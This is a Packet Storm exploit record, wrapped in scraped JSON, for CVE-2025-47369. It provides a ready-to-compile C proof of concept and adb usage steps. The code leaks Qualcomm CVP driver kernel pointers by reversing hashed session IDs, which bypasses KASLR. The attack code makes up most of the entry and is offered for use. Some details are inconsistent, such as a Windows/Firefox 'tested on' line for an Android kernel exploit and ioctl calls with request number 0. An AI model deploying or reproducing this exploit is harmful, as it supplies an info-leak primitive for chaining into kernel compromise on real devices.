{“lastseen”:”2026-01-28T17:49:32″,”description”:”The Qualcomm CVP driver exposes kernel pointers to userland by returning a hashed session ID derived from a kernel pointer using hash32ptr. This function is not a cryptographic hash but a reversible fold that XORs the upper and lower 32 bits of the…”,”published”:”2026-01-28T00:00:00″,”modified”:”2026-01-28T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Qualcomm CVP Kernel Pointer Leak”,”source”:””,”references”:””,”id”:”PACKETSTORM:214496″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-47369″],”sourceData”:”=============================================================================================================================================\\n | # Title : Kernel Pointer Leak via CVP Driver |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 147.0.1 (64 bits) |\\n | # Vendor : https:\/\/docs.qualcomm.com\/product\/publicresources\/securitybulletin\/january-2026-bulletin.html |\\n =============================================================================================================================================\\n \\n [+] References : https:\/\/packetstorm.news\/files\/id\/213733\/ \\u0026 \\tCVE-2025-47369\\n \\n [+] Summary : The Qualcomm CVP driver exposes kernel pointers to userland by returning a \u201chashed\u201d session ID derived from a kernel pointer using hash32_ptr(). \\n This function is not a cryptographic hash but a reversible fold that XORs the upper and lower 32 bits of the pointer. \\n \\t\\t\\t\\t Due to predictable ARM64 kernel virtual address layout and alignment constraints, the session ID can be deterministically \u201cunfolded\u201d to recover the original kernel pointer. \\n \\t\\t\\t\\t This design flaw results in a reliable kernel pointer leak, effectively bypassing KASLR and providing a strong info\u2011leak primitive that can be chained with other vulnerabilities. \\n The issue is tracked as CVE\u20112025\u201147369 and stems from improper use of pointer-derived identifiers rather than an implementation bug.\\n \\n [+] Affected Chipsets : AR8035, AR9380, CSR8811, FastConnect 6200, FastConnect 6700, FastConnect 6900, FastConnect 7800, Immersive Home 214 Platform, \\n Immersive Home 216 Platform, Immersive Home 316 Platform, Immersive Home 318 Platform, IPQ4018, IPQ4019, IPQ4028, IPQ4029, IPQ5010, \\n \\t\\t\\t\\t\\t\\tIPQ5028, IPQ6000, IPQ6010, IPQ6018, IPQ6028, IPQ8064, IPQ8065, IPQ8068, IPQ8070, IPQ8070A, IPQ8071, IPQ8071A, IPQ8072, IPQ8072A, \\n \\t\\t\\t\\t\\t\\tIPQ8074, IPQ8074A, IPQ8076, IPQ8076A, IPQ8078, IPQ8078A, IPQ8173, IPQ8174, QAM8255P, QAM8295P, QAM8620P, QAM8650P, QAM8775P, QAMSRV1H, \\n \\t\\t\\t\\t\\t\\tQAMSRV1M, QCA4024, QCA6174A, QCA6428, QCA6438, QCA6574, QCA6574A, QCA6574AU, QCA6584AU, QCA6595, QCA6595AU, QCA6678AQ, QCA6688AQ, \\n \\t\\t\\t\\t\\t\\tQCA6696, QCA6698AQ, QCA6797AQ, QCA7500, QCA8075, QCA8081, QCA8337, QCA9880, QCA9886, QCA9888, QCA9889, QCA9898, QCA9980, QCA9984, \\n \\t\\t\\t\\t\\t\\tQCA9985, QCA9986, QCA9990, QCA9992, QCA9994, QCC710, QCM5430, QCM6490, QCN5022, QCN5024, QCN5052, QCN5122, QCN5124, QCN5152, QCN5154, \\n \\t\\t\\t\\t\\t\\tQCN5164, QCN6023, QCN6024, QCN6112, QCN6122, QCN6132, QCN6224, QCN6274, QCN9000, QCN9022, QCN9024, QCN9070, QCN9072, QCN9074, QCN9100, \\n \\t\\t\\t\\t\\t\\tQCN9274, QCS5430, QCS615, QCS6490, QCS9100, QEP8111, QFW7114, QFW7124, QMP1000, Qualcommr Video Collaboration VC3 Platform, SA6145P, \\n \\t\\t\\t\\t\\t\\tSA6150P, SA6155P, SA7255P, SA7775P, SA8145P, SA8150P, SA8155P, SA8195P, SA8255P, SA8295P, SA8540P, SA8620P, SA8650P, SA8770P, SA8775P, \\n \\t\\t\\t\\t\\t\\tSA9000P, SC8380XP, SDX55, SM4635, SM6475, SM6650, SM6650P, SM7435, SM7635, SM7635P, SM7675, SM7675P, SM8635, SM8635P, SM8650Q, SM8735, \\n \\t\\t\\t\\t\\t\\tSM8750, SM8750P, Snapdragon 4 Gen 2 Mobile Platform, Snapdragon 6 Gen 1 Mobile Platform, Snapdragon 8 Gen 3 Mobile Platform, Snapdragon \\n \\t\\t\\t\\t\\t\\tAR1 Gen 1 Platform, Snapdragon AR1 Gen 1 Platform \\”Luna1\\”, Snapdragon Auto 5G Modem-RF Gen 2, Snapdragon X32 5G Modem-RF System, \\n \\t\\t\\t\\t\\t\\tSnapdragon X35 5G Modem-RF System, Snapdragon X72 5G Modem-RF System, Snapdragon X75 5G Modem-RF System, SRV1H, SRV1L, SRV1M, SXR2330P, \\n \\t\\t\\t\\t\\t\\tSXR2350P, WCD9340, WCD9370, WCD9375, WCD9378, WCD9380, WCD9385, WCD9390, WCD9395, \\n WCN3950, WCN3988, WCN6650, WCN6755, WCN7750, WCN7860, WCN7861, WCN7880, WCN7881, \\n \\t\\t\\t\\t\\t\\tWSA8810, WSA8815, WSA8830, WSA8832, WSA8835, WSA8840, WSA8845, WSA8845H\\n [+] Usage :\\n \\n # 1. Compile the POC : gcc -o cvp_exploit cvp_exploit.c -static\\n \\n # 2. Upload the file to the machine : adb push cvp_exploit \/data\/local\/tmp\/\\n \\n # 3. Run the exploit :\\n \\n adb shell\\n cd \/data\/local\/tmp\\n chmod +x cvp_exploit\\n .\/cvp_exploit\\n \\n [+] POC :\\n \\n #include \\u003cfcntl.h\\u003e\\n #include \\u003cunistd.h\\u003e\\n #include \\u003cstdio.h\\u003e\\n #include \\u003cstdlib.h\\u003e\\n #include \\u003cerrno.h\\u003e\\n #include \\u003cstring.h\\u003e\\n #include \\u003csys\/ioctl.h\\u003e\\n #include \\u003cstdint.h\\u003e\\n \\n #define EVA_KMD_SESSION_CONTROL 1\\n #define EVA_KMD_GET_SESSION_INFO 2\\n #define SESSION_CREATE 1\\n \\n struct session_ctrl_data {\\n int ctrl_type;\\n \\n };\\n \\n struct session_info_data {\\n unsigned int session_id;\\n \\n };\\n \\n struct eva_kmd_arg {\\n int type;\\n union {\\n struct session_ctrl_data session_ctrl;\\n struct session_info_data session;\\n \\n } data;\\n };\\n \\n unsigned long unfold_pointer(unsigned int session_id) {\\n \\n \\n unsigned char bottom_byte = (session_id \\u0026 0xf) | 0x80;\\n \\n unsigned long top_half = 0xffffff00UL | bottom_byte;\\n \\n unsigned long bottom_half = session_id ^ (top_half \\u0026 0xffffffff);\\n \\n unsigned long kernel_ptr = (top_half \\u003c\\u003c 32) | bottom_half;\\n \\n return kernel_ptr;\\n }\\n \\n int is_valid_kernel_pointer(unsigned long ptr) {\\n \\n if ((ptr \\u003e\\u003e 63) == 1) {\\n return 1;\\n }\\n \\n if ((ptr \\u003e\\u003e 48) == 0xffffff) {\\n return 1;\\n }\\n \\n return 0;\\n }\\n \\n int main(int argc, char *argv[]) {\\n printf(\\”CVE-2025-47369 POC – Kernel Pointer Leak via CVP Driver by indoushka\\\\n\\”);\\n printf(\\”=====================================================================\\\\n\\”);\\n \\n int fd = open(\\”\/dev\/cvp\\”, O_RDWR);\\n if (fd == -1) {\\n perror(\\”Failed to open \/dev\/cvp\\”);\\n printf(\\”Make sure device exists and permissions are correct\\\\n\\”);\\n return EXIT_FAILURE;\\n }\\n printf(\\”[+] Opened \/dev\/cvp (fd=%d)\\\\n\\”, fd);\\n \\n \\n int num_sessions = 3;\\n unsigned long pointers[num_sessions];\\n \\n for (int i = 0; i \\u003c num_sessions; i++) {\\n \\n struct eva_kmd_arg create_arg = {\\n .type = EVA_KMD_SESSION_CONTROL,\\n .data.session_ctrl.ctrl_type = SESSION_CREATE,\\n };\\n \\n if (ioctl(fd, 0, \\u0026create_arg) \\u003c 0) {\\n perror(\\”Failed to create session\\”);\\n close(fd);\\n return EXIT_FAILURE;\\n }\\n \\n struct eva_kmd_arg info_arg = {\\n .type = EVA_KMD_GET_SESSION_INFO,\\n .data.session.session_id = 0\\n };\\n \\n if (ioctl(fd, 0, \\u0026info_arg) \\u003c 0) {\\n perror(\\”Failed to get session info\\”);\\n close(fd);\\n return EXIT_FAILURE;\\n }\\n \\n unsigned int session_id = info_arg.data.session.session_id;\\n printf(\\”[+] Session %d created – session_id: 0x%08x\\\\n\\”, \\n i + 1, session_id);\\n \\n unsigned long kernel_ptr = unfold_pointer(session_id);\\n pointers[i] = kernel_ptr;\\n \\n if (is_valid_kernel_pointer(kernel_ptr)) {\\n printf(\\” [+] Leaked kernel pointer: 0x%016lx\\\\n\\”, kernel_ptr);\\n \\n printf(\\” [+] Pointer analysis:\\\\n\\”);\\n printf(\\” – Upper 32 bits: 0x%08lx\\\\n\\”, kernel_ptr \\u003e\\u003e 32);\\n printf(\\” – Lower 32 bits: 0x%08lx\\\\n\\”, kernel_ptr \\u0026 0xffffffff);\\n printf(\\” – XOR result: 0x%08x\\\\n\\”, \\n (unsigned int)((kernel_ptr \\u003e\\u003e 32) ^ (kernel_ptr \\u0026 0xffffffff)));\\n } else {\\n printf(\\” [-] Invalid\/unexpected pointer format: 0x%016lx\\\\n\\”, \\n kernel_ptr);\\n }\\n \\n printf(\\”\\\\n\\”);\\n }\\n \\n printf(\\”[+] Pattern Analysis:\\\\n\\”);\\n for (int i = 1; i \\u003c num_sessions; i++) {\\n long diff = pointers[i] – pointers[i-1];\\n printf(\\” Difference between session %d and %d: %ld bytes (0x%lx)\\\\n\\”,\\n i, i – 1, diff, diff);\\n }\\n \\n printf(\\”\\\\n[+] System Information:\\\\n\\”);\\n printf(\\” Pointer size: %lu bits\\\\n\\”, sizeof(void*) * 8);\\n printf(\\” Long size: %lu bits\\\\n\\”, sizeof(unsigned long) * 8);\\n \\n close(fd);\\n printf(\\”[+] Exploit completed successfully\\\\n\\”);\\n \\n return EXIT_SUCCESS;\\n }\\n \\n Greetings to :============================================================\\n jericho * Larry W. Cashdollar * r00t * Malvuln (John Page aka hyp3rlinx)*|\\n ==========================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/214496″,”cvss”:{“score”:5.5,”severity”:”MEDIUM”,”vector”:”CVSS:3.1\/AV:L\/AC:L\/PR:L\/UI:N\/S:U\/C:H\/I:N\/A:N”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/214496\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-01-28T17:49:32″,”description”:”The Qualcomm CVP driver exposes kernel pointers to userland by returning a hashed session ID derived from a kernel pointer using hash32ptr. This function is…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,70,12,21,13,53,7,11,5],"class_list":["post-37901","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-55","tag-exploit","tag-medium","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n